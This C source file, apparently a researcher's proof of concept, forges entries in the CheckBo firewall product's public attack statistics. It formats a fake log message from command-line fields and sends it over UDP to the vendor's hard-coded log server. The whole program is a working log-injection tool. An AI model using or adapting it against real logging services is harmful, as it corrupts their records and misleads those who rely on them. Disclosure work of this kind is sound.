/*

CheckBo server statistics customizer
by Luigi Auriemma (e-mail: aluigi@autistici.org)

This is only a proof-of-concept because the CheckBo support and all
related services seems to be all finished (so the log server too).

See the new log here: http://www.checkbo.com/statat.asp

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define    close    closesocket
    #define sleep   Sleep
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
#endif



#define VER     "0.2"
#define SERVER  "log.checkbo.com"     //212.210.146.71
#define PORT    14188
#define BUFFSZ  512
#define MSG     "%s ; %s\n ; Remote IP: %s ; %s ; Port: %d ; Local Port: %d ; Type: %s"



u_int resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    char    buff[BUFFSZ];
    struct  sockaddr_in    peer;
    int     sd,
            err,
            len;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(2,0), &wsadata);
#endif


    setbuf(stdout, NULL);

    printf("\n"
        "CheckBo server statistics customizer "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n");

    if(argc < 8) {
        printf("\nUsage: statcust <version> <date> <ip> <hostname> <port> <local port> <attack>\n\n");
        exit(1);
    }

    len = snprintf(buff, BUFFSZ,
        MSG,
        argv[1],
        argv[2],
        argv[3],
        argv[4],
        atoi(argv[5]),
        atoi(argv[6]),
        argv[7]);

    peer.sin_addr.s_addr = resolv(SERVER);
    peer.sin_port        = htons(PORT);
    peer.sin_family      = AF_INET;

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();

    err = sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer));
    if(err < 0) std_err();

    close(sd);

    printf("\nStatistic message sended successfully!\n\n");
    return(0);
}



u_int resolv(char *host) {
    struct        hostent    *hp;
    u_int        host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolve hostname (%s)\n",
                host);
            exit(1);
        } else host_ip = *(u_int *)(hp->h_addr);
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


